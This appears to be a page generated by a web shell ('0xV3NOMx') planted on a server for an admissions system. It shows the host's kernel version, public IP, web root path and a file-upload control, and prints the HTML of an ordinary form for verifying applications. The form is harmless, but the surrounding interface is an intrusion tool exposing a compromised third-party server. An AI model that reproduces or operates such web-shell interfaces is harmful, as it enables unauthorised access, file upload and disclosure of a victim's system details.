0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.21.105.222


Current Path : /var/www/oasis/html_modules/
Upload File :
Current File : /var/www/oasis/html_modules/ack_adm_application.html

<script type="text/javascript">
    $(function () {
        $('#tabs').tabs()
    })
    $(function () {
        $('#sub_tabs').tabs()
    })
</script>
<div id="tabs">
    <ul>
        <li>
            <a href="#ack_rv_rt_application"
                >Verify and Acknowledge Applications</a
            >
        </li>
    </ul>
    <div id="ack_rv_rt_application" style="overflow: auto; padding: 1rem">
        <table class="content-tbl" cellpadding="5" cellspacing="2" width="100%">
            <tr>
                <td style="width: 140px" align="right">Degree:</td>
                <td>
                    <select
                        name="combination"
                        id="adm_degree"
                        class="textInputEnabled"
                        style="width: 100%; height: 28px"
                    ></select>
                </td>
            </tr>
            <tr>
                <td style="width: 140px" align="right">Appl. Status:</td>
                <td>
                    <select
                        name="status"
                        id="status"
                        class="textInputEnabled"
                        style="width: 100%; height: 28px"
                    >
                        <option value="Pending">Pending Verification</option>
                        <option value="Verified">Verified</option>
                        <option value="all">All Applications</option>
                    </select>
                </td>
            </tr>
            <tr style="display: none">
                <td style="width: 140px" align="right">Appl. No. Range:</td>
                <td>
                    <input
                        type="text"
                        id="appfrom"
                        value="0"
                        class="textInputEnabled"
                        style="width: 200px; height: 20px; text-align: center"
                        disabled
                    />
                    -
                    <input
                        type="text"
                        id="appto"
                        value="Z"
                        class="textInputEnabled"
                        style="width: 200px; height: 20px; text-align: center"
                        disabled
                    />
                </td>
            </tr>

            <tr>
                <td></td>
                <td>
                    <span
                        style="
                            background-color: #008cba;
                            border: none;
                            color: white;
                            padding: 6px 15px;
                            text-align: center;
                            text-decoration: none;
                            display: inline-block;
                            font-size: 12px;
                            cursor: pointer;
                            border-radius: 3px;
                        "
                        onclick="DisplayAdmApplication();"
                        >View Applications</span
                    >
                </td>
            </tr>
        </table>
        <div
            align="left"
            id="adm_applications"
            style="overflow: auto; width: 100%; margin-top: 1rem"
        ></div>
        <br />
    </div>
</div>